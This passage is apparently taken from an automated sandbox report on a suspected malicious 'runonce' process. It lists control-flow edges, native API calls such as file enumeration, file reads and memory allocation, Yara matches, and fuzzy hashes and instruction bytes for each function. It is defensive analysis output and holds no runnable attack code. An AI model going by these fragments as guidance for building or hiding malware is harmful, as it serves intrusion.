30f9bac-30f9bb8 78->81 82 30f9be5 78->82 85 30f9cbd-30f9cc4 79->85 86 30f9c8b-30f9caa 79->86 88 30f9c7d 80->88 89 30f9c71-30f9c77 80->89 90 30f9bbf-30f9bc1 81->90 91 30f9bba-30f9bbe 81->91 82->57 83->58 95 30f9b2f-30f9b35 84->95 96 30f9b38 84->96 97 30f9cc6-30f9cd0 85->97 98 30f9d40-30f9d49 85->98 93 30f9cac-30f9cb5 86->93 94 30f9cbb 86->94 88->71 89->88 99 30f9bd4-30f9bdd 90->99 100 30f9bc3-30f9bd2 90->100 91->90 93->94 94->79 95->96 96->74 101 30f9ce1-30f9ced 97->101 103 30f9d4b-30f9d63 98->103 104 30f9d65-30f9d71 98->104 107 30f9be3 99->107 100->107 108 30f9cef-30f9d01 101->108 109 30f9d03 call 3119770 101->109 103->98 105 30f9d96-30f9da0 104->105 106 30f9d73-30f9d94 104->106 110 30f9dd3-30f9ddd 105->110 111 30f9da2-30f9dc1 105->111 106->104 107->78 114 30f9cd2-30f9cdb 108->114 118 30f9d08-30f9d0f 109->118 117 30f9dee-30f9dfa 110->117 115 30f9dc3-30f9dcb 111->115 116 30f9dd1 111->116 114->101 115->116 116->105 119 30f9e0d-30f9e17 117->119 120 30f9dfc-30f9e0b 117->120 118->98 121 30f9d11-30f9d3e 118->121 120->117 121->118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !$$$$i$)$-$16$3$6'$6;$8C$;$<n$C$Dw$E)!$Er$N$O$S$T$Z;$[$]$cA$d$d$k$lW$r$vc$y$z
                                          • API String ID: 0-3167844322
                                          • Opcode ID: 17f72081993f1350ba3dcad221bfd468072d57c041a8682a4f70213efaf9b8fa
                                          • Instruction ID: 2d648ca098a45d938ec1be96765c6e5b8689206d36fce45bbae1f99682571910
                                          • Opcode Fuzzy Hash: 17f72081993f1350ba3dcad221bfd468072d57c041a8682a4f70213efaf9b8fa
                                          • Instruction Fuzzy Hash: BB428AB0906229CFEB64CF45C998BDDBBB1BB45308F1081D9C64D6B681C7B95AC9CF84
                                          Function 0310BA90 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0310BB74
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0310BBAF
                                          • FindClose.KERNELBASE(?), ref: 0310BBBA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: 0017a93d3205b3efa7fcf2b79af04eccd76381ec53dafa3fad9846cf36fa16e2
                                          • Instruction ID: 95c92d2cef1946a65a1f528d6671867ae9c44a8f7cf65c42c1eb5d55e08a0b6c
                                          • Opcode Fuzzy Hash: 0017a93d3205b3efa7fcf2b79af04eccd76381ec53dafa3fad9846cf36fa16e2
                                          • Instruction Fuzzy Hash: 263174B5904308BBDB20DF64CC85FEF777CDF88754F1445A8B918AB180D7B4AA948BA0
                                          Function 03117920 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03117A10
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 867ed298efe7a846261c740fdf5280c3ee3bf7386c092a51625ad0b6e288e5bc
                                          • Instruction ID: a0dd28ac3697104628c968bb496440403334ac20d6c8a52afa93c67dd0feee36
                                          • Opcode Fuzzy Hash: 867ed298efe7a846261c740fdf5280c3ee3bf7386c092a51625ad0b6e288e5bc
                                          • Instruction Fuzzy Hash: 6331C6B5A01609AFCB14DF99D881EEFB7F9AF8C314F108259F918A7340D730A951CBA5
                                          Function 03117A80 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03117B58
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 4fe4d4a4f5fba608506e6ee99c311c2000c566b40a5d4f96252ecb147c3a56cd
                                          • Instruction ID: 7bb71919d0e45cdb3f9f2757139f80aeeed3d67b6882717098472b078f506727
                                          • Opcode Fuzzy Hash: 4fe4d4a4f5fba608506e6ee99c311c2000c566b40a5d4f96252ecb147c3a56cd
                                          • Instruction Fuzzy Hash: 3F31D7B5A01609AFCB14DF59D880EEFB7B9EF8C314F10821AFD18A7240D730A911CBA4
                                          Function 03117D40 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(031015BE,?,031169D7,00000000,00000004,00003000,?,?,?,?,?,031169D7,031015BE,031169D7,00000000), ref: 03117DFD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: da1a8f351d8819f43fa8ac7bd25e82019e0a88ec241fd628c0d54c0e00b0e3d8
                                          • Instruction ID: 6d0267bd9cb51d9aa43786cd5583f1ab606d65d0b95533ea200233c4b9394f73
                                          • Opcode Fuzzy Hash: da1a8f351d8819f43fa8ac7bd25e82019e0a88ec241fd628c0d54c0e00b0e3d8
                                          • Instruction Fuzzy Hash: E1210A75A01609AFCB14DF58DC81FEFB7A9EF8C310F00851AFD18A7240E770A9218BA5
                                          Function 03117B60 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 7e7ff9e7b1ca138608ac6c7e57f32c91d1ba2697154d09500ad5ba06417acfc5
                                          • Instruction ID: 518c2c23b13d843a22afd8071204a9e523240094d75eaffd727d9f9442d4c1b4
                                          • Opcode Fuzzy Hash: 7e7ff9e7b1ca138608ac6c7e57f32c91d1ba2697154d09500ad5ba06417acfc5
                                          • Instruction Fuzzy Hash: 54015E35A41744BFD624EA64DC41FEBB7ACDFC8610F40845AFA18AB180EB757910C7A5
                                          Function 03117BF0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03117C24
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: c4a52db1624aee6394cd4238915a4ff74d2b7e8a15e58c6595a88deeb0a8acb4
                                          • Instruction ID: fd6a7ecfeb413d877dc60266edced95ce110674c8675f99db7b4e0db4dec2a48
                                          • Opcode Fuzzy Hash: c4a52db1624aee6394cd4238915a4ff74d2b7e8a15e58c6595a88deeb0a8acb4
                                          • Instruction Fuzzy Hash: 05E04636241714BBD220EA69DC01FDBB7ACDFC9664F418015FA08AB241D771B91086B0
                                          Function 050C4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 49014e7c33c1b3ade6ef1d4a0e455db6035f86c76a127adc72903f36dcd77de8
                                          • Instruction ID: 6654fae23614c116ba58e0d07273650356f2939cda8d864709187dc2898dd5c5
                                          • Opcode Fuzzy Hash: 49014e7c33c1b3ade6ef1d4a0e455db6035f86c76a127adc72903f36dcd77de8
                                          • Instruction Fuzzy Hash: CF9002616012404285407158994440AA0159BE13017D1C559A0544560CC6288855A279
                                          Function 050C4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d60cd35eb59a01b8d592a8956d550e41d3c96d7713776029324fed834dc4d916
                                          • Instruction ID: f1b98ed2000353a8ae84f666a449fdf5b3254a2a4a3182d6e22d6b0dd57f90fd
                                          • Opcode Fuzzy Hash: d60cd35eb59a01b8d592a8956d550e41d3c96d7713776029324fed834dc4d916
                                          • Instruction Fuzzy Hash: 4590023160554012D540715899C454A80159BE0301F91C455E0414554CCA2489566371
                                          Function 050C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bf39b01d603bf7a12581952cba2d4d89120a4c23c1b03c0104ace15afea75b47
                                          • Instruction ID: 9f608d4820a52d6d58a213cad6b22705b7c2cd51f747d46576397c9b5071c3e4
                                          • Opcode Fuzzy Hash: bf39b01d603bf7a12581952cba2d4d89120a4c23c1b03c0104ace15afea75b47
                                          • Instruction Fuzzy Hash: F590023120114413D5116158964470B40198BD0241FD1C856A0414558DD6668952B131
                                          Function 050C2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3eb5a97342a97e67cf7de0a690ad5975f9d84b216de2a9d3abb48900b8eb2098
                                          • Instruction ID: 8d3a5d90c3c0deafebb4bc6b947f18fc6e9759b80b767c087cd6310514001234
                                          • Opcode Fuzzy Hash: 3eb5a97342a97e67cf7de0a690ad5975f9d84b216de2a9d3abb48900b8eb2098
                                          • Instruction Fuzzy Hash: 1490022160114502D5017158954461A401A8BD0241FD1C466A1014555ECA358992B131
                                          Function 050C2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 631184192708a93b062995860d40e9e895b9468f56403e80a7bec178fa141212
                                          • Instruction ID: ff5368ae397336143d678229cc3930f6cfc178ac5a4045a09d2fbc2e26762fe1
                                          • Opcode Fuzzy Hash: 631184192708a93b062995860d40e9e895b9468f56403e80a7bec178fa141212
                                          • Instruction Fuzzy Hash: 4490022921314002D5807158A54860E40158BD1202FD1D859A0005558CC92588696331
                                          Function 050C2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d4acaf3d99cc04fdf332a8218375dc4690493cba1280cbb87161b4663db8d4bd
                                          • Instruction ID: 596289af70221b83df1c06b525ed522a82f2aac24723fd6d403c0e2bbd492851
                                          • Opcode Fuzzy Hash: d4acaf3d99cc04fdf332a8218375dc4690493cba1280cbb87161b4663db8d4bd
                                          • Instruction Fuzzy Hash: 1990022130114003D5407158A55860A8015DBE1301F91D455E0404554CD92588566232
                                          Function 050C2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b09d824407b0d2953746c0136b270225ff3d821f06ae61c7b62ef7edf82b8994
                                          • Instruction ID: 23514696de6f5f39b814fa9e8e4c10df963c544f63ca37a9ad47bae1f21ce5f2
                                          • Opcode Fuzzy Hash: b09d824407b0d2953746c0136b270225ff3d821f06ae61c7b62ef7edf82b8994
                                          • Instruction Fuzzy Hash: D3900221242181529945B158954450B80169BE0241BD1C456A1404950CC5369856E631
                                          Function 050C2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 31e78b0dcb3436ced031a18bddf7548f8b8475215e877ba5682dc502afcd829d
                                          • Instruction ID: 7d7658e6259c8a1a177f1ad2a9b626fb81918177c93f66dcdff2da7e9e1ba218
                                          • Opcode Fuzzy Hash: 31e78b0dcb3436ced031a18bddf7548f8b8475215e877ba5682dc502afcd829d
                                          • Instruction Fuzzy Hash: 6A90022121194042D60065689D54B0B40158BD0303F91C559A0144554CC92588616531
                                          Function 050C2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 05c4ba94413780f906c2453d2a1951e5c9537ff6b4b50adea1a3830d8e1e0683
                                          • Instruction ID: 21413483705f356985b3adcd94ea74a291046d8424f13ce3ad18894efab100ca
                                          • Opcode Fuzzy Hash: 05c4ba94413780f906c2453d2a1951e5c9537ff6b4b50adea1a3830d8e1e0683
                                          • Instruction Fuzzy Hash: 9990026120154403D5406558994460B40158BD0302F91C455A2054555ECA398C517135
                                          Function 050C2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1522051ef38295ab039871cc40d6f7a591bef897e369c659aa0e99607dcacbaf
                                          • Instruction ID: 03ced4219cfd71c27d6a9e8d205165c2175f12a0fd1b49b0310b2d8c985b96bb
                                          • Opcode Fuzzy Hash: 1522051ef38295ab039871cc40d6f7a591bef897e369c659aa0e99607dcacbaf
                                          • Instruction Fuzzy Hash: 3990026134114442D50061589554B0A4015CBE1301F91C459E1054554DC629CC527136
                                          Function 050C2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3d2d3fbe723f3ed1a9fecac3a08c122446ca78e4b11a8afcb8486d47da19c18e
                                          • Instruction ID: 0dc35c0441c0ab27d2afc3089cb4d2c948e0160b8b5390d04af8817571d3a761
                                          • Opcode Fuzzy Hash: 3d2d3fbe723f3ed1a9fecac3a08c122446ca78e4b11a8afcb8486d47da19c18e
                                          • Instruction Fuzzy Hash: 7A9002216011404285407168D98490A8015AFE1211B91C565A0988550DC56988656675
                                          Function 050C29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b971ead80d7a6dcf5494c639019601489e80491470d0193cbdd1de403900f0fe
                                          • Instruction ID: 307d41e32bb86bcefc1cc4ca29d14ef7dd396077395ba2317b614427d0cf8f22
                                          • Opcode Fuzzy Hash: b971ead80d7a6dcf5494c639019601489e80491470d0193cbdd1de403900f0fe
                                          • Instruction Fuzzy Hash: DB900435311140034505F55C574450F4057CFD53517D1C475F1005550CD731CC717131
                                          Function 050C2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e29eceb1ec2dd3a12d616d7818a1c48f38331c72734d2a4b694dc9959ecb1544
                                          • Instruction ID: 21d564c50483f864bfc23e68a5d50dc0f88b8adb504655ba40eba21e10ded944
                                          • Opcode Fuzzy Hash: e29eceb1ec2dd3a12d616d7818a1c48f38331c72734d2a4b694dc9959ecb1544
                                          • Instruction Fuzzy Hash: 9990023120518842D54071589544A4A40258BD0305F91C455A0054694DD6358D55B671
                                          Function 050C2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 85e6a518af4839900558cfe314a1f2e4b9b6cf58f9b68c62d444d9abf38900fb
                                          • Instruction ID: 6d2ba3036cc7286b75ef18786a4535c60f5e5fd7f76831dce5fc5a2485dc9454
                                          • Opcode Fuzzy Hash: 85e6a518af4839900558cfe314a1f2e4b9b6cf58f9b68c62d444d9abf38900fb
                                          • Instruction Fuzzy Hash: 2690023120114802D5807158954464E40158BD1301FD1C459A0015654DCA258A5977B1
                                          Function 050C2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6e34bacb192e81e263b613bf8a0fe2bf987d3779828f2099cb11521e159cd81c
                                          • Instruction ID: 3dcb525fdacf217ebbb188efe4c4aa04ad2ca8012341cc3d5fc90b04d95bea48
                                          • Opcode Fuzzy Hash: 6e34bacb192e81e263b613bf8a0fe2bf987d3779828f2099cb11521e159cd81c
                                          • Instruction Fuzzy Hash: 5F90023120114842D50061589544B4A40158BE0301F91C45AA0114654DC625C8517531
                                          Function 050C2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f653268edf942acdb10286a60aa4552289658773f0c94e57d65278ed7285f3cc
                                          • Instruction ID: 375c9264b9ecb3849a8a1d420e05e363cf6fbdf0639b991c2a8284a09e34ae2b
                                          • Opcode Fuzzy Hash: f653268edf942acdb10286a60aa4552289658773f0c94e57d65278ed7285f3cc
                                          • Instruction Fuzzy Hash: BE9002312011C802D5106158D54474E40158BD0301F95C855A4414658DC6A588917131
                                          Function 050C2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c049ff1ea7437dafa2e2a81afc6edd99662b2c4e981a76bc8072a2ffdad3d463
                                          • Instruction ID: 8ece3e4af4186328fb0709cf8eb7fffb2af31cd30d05b9fcd43aff5c0b2f989b
                                          • Opcode Fuzzy Hash: c049ff1ea7437dafa2e2a81afc6edd99662b2c4e981a76bc8072a2ffdad3d463
                                          • Instruction Fuzzy Hash: 1190023120114402D5006598A54864A40158BE0301F91D455A5014555EC67588917131
                                          Function 050C2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4120ba03be360642fb4f6b3740a3b9de867e0a64cfcd8852737bfceccdeb2f84
                                          • Instruction ID: 6925b8caa3557da397a1afa655ef8315528a70278adb81596414aaef3a97140b
                                          • Opcode Fuzzy Hash: 4120ba03be360642fb4f6b3740a3b9de867e0a64cfcd8852737bfceccdeb2f84
                                          • Instruction Fuzzy Hash: C6900225221140024545A558574450F44559BD63517D1C459F1406590CC63188656331
                                          Function 050C2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
